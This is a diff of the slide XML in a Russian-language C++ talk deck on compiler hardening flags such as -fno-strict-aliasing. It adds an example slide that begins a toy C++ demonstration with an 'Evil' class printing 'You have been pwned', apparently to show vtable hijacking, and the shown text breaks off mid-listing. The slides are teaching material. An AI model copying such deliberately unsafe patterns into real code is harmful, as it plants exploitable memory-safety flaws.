-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fno</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-delete-null-pointer-checks</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fno</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-strict-overflow</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>== -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fwrapv</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fwrapv</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fno</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-strict-aliasing</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Флаги по умолчанию выключены во всех компиляторах и дистрибутивах</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Но многие пакеты в дистрах собираются по крайней мере с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fno</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-strict-aliasing</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Т.к. правила алиасинга особенно легко нарушить</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>проверить сколько пакетов используют эти флаги (как ?)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014055000"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -22517,6 +22518,290 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968FA426-DD3C-438B-A365-8664F144CD4B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как использовать</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A153389F-DAD8-493A-B583-3F5F530780E3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Обычно для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC/Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>отключают</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-delete-null-pointer-checks</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-strict-overflow</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>== -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fwrapv</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fwrapv</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-strict-aliasing</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Флаги по умолчанию выключены во всех компиляторах и дистрибутивах</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Но многие пакеты в дистрах собираются по крайней мере с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-strict-aliasing</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Т.к. правила алиасинга особенно легко нарушить</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проверить сколько пакетов используют эти флаги (как ?)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014055000"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide71.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6C92A7-677E-4576-AB17-AD95F9FAA24A}"/>
               </a:ext>
             </a:extLst>
@@ -22578,7 +22863,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide71.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide72.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22665,7 +22950,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide72.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide73.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22749,7 +23034,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide73.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide74.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23119,7 +23404,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide74.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide75.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23335,7 +23620,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide75.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide76.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -77,10 +77,16 @@
     <p:sldId id="327" r:id="rId71"/>
     <p:sldId id="328" r:id="rId72"/>
     <p:sldId id="329" r:id="rId73"/>
-    <p:sldId id="330" r:id="rId74"/>
-    <p:sldId id="331" r:id="rId75"/>
-    <p:sldId id="271" r:id="rId76"/>
-    <p:sldId id="270" r:id="rId77"/>
+    <p:sldId id="334" r:id="rId74"/>
+    <p:sldId id="335" r:id="rId75"/>
+    <p:sldId id="336" r:id="rId76"/>
+    <p:sldId id="337" r:id="rId77"/>
+    <p:sldId id="338" r:id="rId78"/>
+    <p:sldId id="339" r:id="rId79"/>
+    <p:sldId id="330" r:id="rId80"/>
+    <p:sldId id="331" r:id="rId81"/>
+    <p:sldId id="271" r:id="rId82"/>
+    <p:sldId id="270" r:id="rId83"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -22903,7 +22909,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Введение</a:t>
+              <a:t>Пример</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -22927,12 +22933,680 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO</a:t>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>include &lt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>stdio.h</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>struct A { virtual void foo() {} };</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>struct B : A { void foo() override {} };</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>struct Evil { virtual void foo() {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>printf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>("You have been </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pwned</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>\n"); }</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>};</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>A *</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>tmp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> = new B;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>int main() {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  A *a = new A;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
